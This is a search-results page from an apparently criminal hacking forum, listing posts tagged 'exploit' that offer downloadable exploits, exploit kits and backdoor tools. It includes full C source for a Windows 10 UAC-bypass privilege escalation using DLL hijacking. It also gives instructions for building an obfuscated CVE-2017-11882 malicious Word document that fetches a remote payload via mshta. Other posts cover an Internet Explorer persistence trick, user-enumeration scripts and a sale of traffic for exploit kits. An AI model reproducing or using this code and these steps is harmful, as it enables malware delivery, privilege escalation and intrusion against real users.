Search the Community

Showing results for tags 'exploit'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
    • Cracking Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Premium Accounts
    • Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Cracking Zone PRIV8
    • Cracking Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area


There are no results to display.

There are no results to display.

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start








Found 30 results

  1. Pompem - Exploit and Vulnerability Finder Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database ... [HIDE][Hidden Content]]
  2. 0x1

    Exploit Pack Priv8

    [Hidden Content] Download : [Hidden Content] More Info : [hide][Hidden Content]] Happy hacking!
  3. Dr HeX Zombi Bot 5.7 Red Evil Best Auto Shell Upload Bot For FREE. Zombi 5.7 is The Latest And Best Auto Exploit Bot Ever. Download: [HIDE][Hidden Content]] Password:
  4. Remot3d - An Simple Exploit for PHP Language It's easy to create a backdoor in an instant, the backdoor can be used in a remote process via a Linux terminal on the server that runs the PHP Language program. Made to bypass the system that is disabled on the server, especially for reading sensitive files that are /etc/passwd Donate If this project very help you to penetration testing and u want support me , you can give me a cup of coffee :) List of Remot3d Functions Create backdoor for windows or linux servers (can run php file) Bypass disable function's with imap_open vulnerability Bypass read file /etc/passwd with cURL or Unique Logic Script's Generating Backdoor and can be remoted on Tools Some other fun stuff :) [HIDE][Hidden Content]]
  5. I am releasing here one of my Silent Office Exploit cve2017-11882 Obfuscation UD as vouch for all members its 7/35 now its alittle old but still good to learn from it or even can use it If you take alook in the code you will found its completely obfuscated and this really more than you look here is the free version its incl obfuscated HTA file as well 1. install python higher than 2.7 2. open HTA with notepad and replace putty link with your direct link 3. upload HTA to direct link 4. open cmd/dos and go to exploit dir and type this cmd : -c "mshta [Hidden Content]" -o infected.doc Download link incl HTA file : [HIDE][Hidden Content]] Password:
  6. Download: [HIDE][Hidden Content]] Password:
  7. //Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass) Exploit #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) { HMODULE hMod = GetModuleHandle(NULL); HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName); DWORD dllSize = SizeofResource(hMod, res); void* dllBuff = LoadResource(hMod, res); HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL); DWORD sizeOut; WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL); CloseHandle(hDll); } int main() { _SHELLEXECUTEINFOW se = {}; //Create Mock SystemRoot Directory CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0); CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0); CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false); //Drop our dll for hijack DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll"); //Execute our winSAT.exe copy from fake trusted directory se.cbSize = sizeof(_SHELLEXECUTEINFOW); se.lpFile = L"C:\\Windows \\System32\\winSAT.exe"; se.lpParameters = L"formal"; se.nShow = SW_HIDE; se.hwnd = NULL; se.lpDirectory = NULL; ShellExecuteEx(&se); return 0; }
  8. dEEpEst

    0day Exploit ReadFile Windows 0day

    [Hidden Content]
  9. This archive is a embed exploit that bookmarks any url given. It all starts by sending IE user in a iframe or any other method to your (index.php?url=[Hidden Content]). Any time a IE user visit the url it will popup a warning and if the user presses Yes it will add your domain to the system and start the website everytime the computer starts. How to use? 1) Upload index.php and add your domain in front of ?url= 2) Send your IE visitors to the url 3) Anytime a user press Yes. Your site url is added 4) Now everytime a infected machine starts the system it will open your url in Internet Explorer. How to remove? To remove is quite simple, open your registry editor and navigate to the key. From there just delete it. Download [Hidden Content] Virustotal [Hidden Content]
  10. Download: [HIDE][Hidden Content]] Password:
  11. Zimbra Collaboration User Enumeration Script (CVE-2018-10949) How to use The argument --host must be the hostname or IP address of Zimbra Collaboration Web Application root page, and --userlist an list of usernames to check against it. root@kali# ./ --host [Hidden Content] --userlist /tmp/emails.txt And it should spill out valid e-mails! [Hidden Content]
  12. CVE-2018-15473-Exploit Exploit written in Python for CVE-2018-15473 with threading and export formats Threading - default 5 If more than 10 are used, often the OpenSSH service gets overwhelmed and causes retries Single username evaluation via username parameter Multiple username evaluation via userList parameter Multiple username evaluation file output via outputFile parameter Multiple output formats (list, json, csv) via outputFormat parameter An example username input file is given in exampleInput.txt An example results output file in List format is given in exampleOutput.txt An example results output file in JSON format is given in exampleOutput.json An example results output file in CSV format is given in exampleOutput.csv Build the image: docker build -t cve-2018-15473 . Run the exploit: docker run cve-2018-15473 -h Delete containers and image: docker ps -a | awk '$2 == "cve-2018-15473" {print $1}' | xargs docker rm docker rmi cve-2018-15473 [Hidden Content]
  13. Buy European traffic for Exploit Kit 1k - $ 4 USD if you have, add me Telegram:@TwoStarMarket
  14. dEEpEst

    exploit PDF Exploit Builder

    Download: [HIDE][Hidden Content]] Passwoord:
  15. dEEpEst

    python UAC EXPLOIT

    [Hidden Content]
  16. Download: [hide][Hidden Content]] Password:
  17. Create specially crafted URLs for Download [Hidden Content] Virustotal [Hidden Content]
  18. 0x1

    Auto Root Exploit

    Auto Root Exploit Tool Author : Nilotpal Biswas USAGE : for kernel version 2.6 all ./ 2 for kernel version 3 all ./ 3 for kernel version 4 all ./ 4 for freebsd & openbsd all ./ bsd for apple macos all ./ app for kernel 2.6,3,4 bsd & app all ./ all Download & Source : [Hidden Content]
  19. Download: [hide][Hidden Content]] Password:
  20. dEEpEst

    Gr3eNoX Exploit Scanner

    Download: [hide][Hidden Content]] Password:
  21. dEEpEst

    exploit Exploits Packs 2018

    Exploits Packs 2018 0x88 8MS08-067- Exploit 25 exploit kit Adpack Exploit Pack 2.0.0 Apanda pack Armitage Exploit Pack 1.0.0 Aurora Chinese Exploit blackhole Bleeding Life v2 bomba Chinese Exploit JS chinese Exploit CRIMEPACK 2.0 CRIMEPACK 3.0 Cry Exploit Pack 2.7.2 cry217 Cute czb_1. 1.1-7a DLoader eventi pack Exploit Automatized Exploit chino + WeB Exploit Kit Chinese Fake Game 1 Fake Game 2 Fake Game 3 fiesta firepack Fragus BlacK Generator Exploits Gong Da Pack Gpack Exploit Pack 0.1.2 paquete de hielo 3 Ice_pack_Platinum_Edition2_009_IDT_Group_and_BlackSun IcePack-Platinum09-1x33x7-ES IE exploit Kit IE Exploit Pack chino IE Generador [Aurora] apasionado 20 FrameShit en Infector Pack de exploit 0.1.1 intoxicado jiji Exploit K0de Sploit Pack KaiXin Exploit Pack Kein Exploit Pack Le_fiesta_1_8 Life Limbo Troyan Kit LinuQ Sploit Pack luckysploit Luiz Eleonore Exp 1.2 MassInfect Merry Christmas Pack mpack multisploit my-poly-sploit n404 Napoleon Sploit 1.0 Neon Exploit sistem neosploit-2 Spl0its Nuke p4ck Open Source Exploit Pack paquetes pex_2.5 Phoenix phoenix2.4 phoenix23 primer Exploit v.1.2 sistema RDS Rojo Exploit Pack 2.0.0 SALO Seo Sploit Paquete chamán de Siberia Exploit Pack inteligente Exploit Pack 2.0.0 SPACK [Light Edition] araña Paquete sv14 Exploit Pack Target Exploit Pack 0.16 tongji Tornado Exploit Kit ttedu Pack Unique Pack webattacker wow Pack X-Pack [Hecho en casa] X-Pack Exploit Yang Pack yes_exploit_system yes2.0 Zero Exploit pack Zombie Infeccion Kit zoPack_v1.2 Chinese Exploit This list of Exploits is very extensive to analyze, you are responsible for running these programs within a secure environment (virtual machine) outside of your real machine. Download: [hide][Hidden Content]] Password: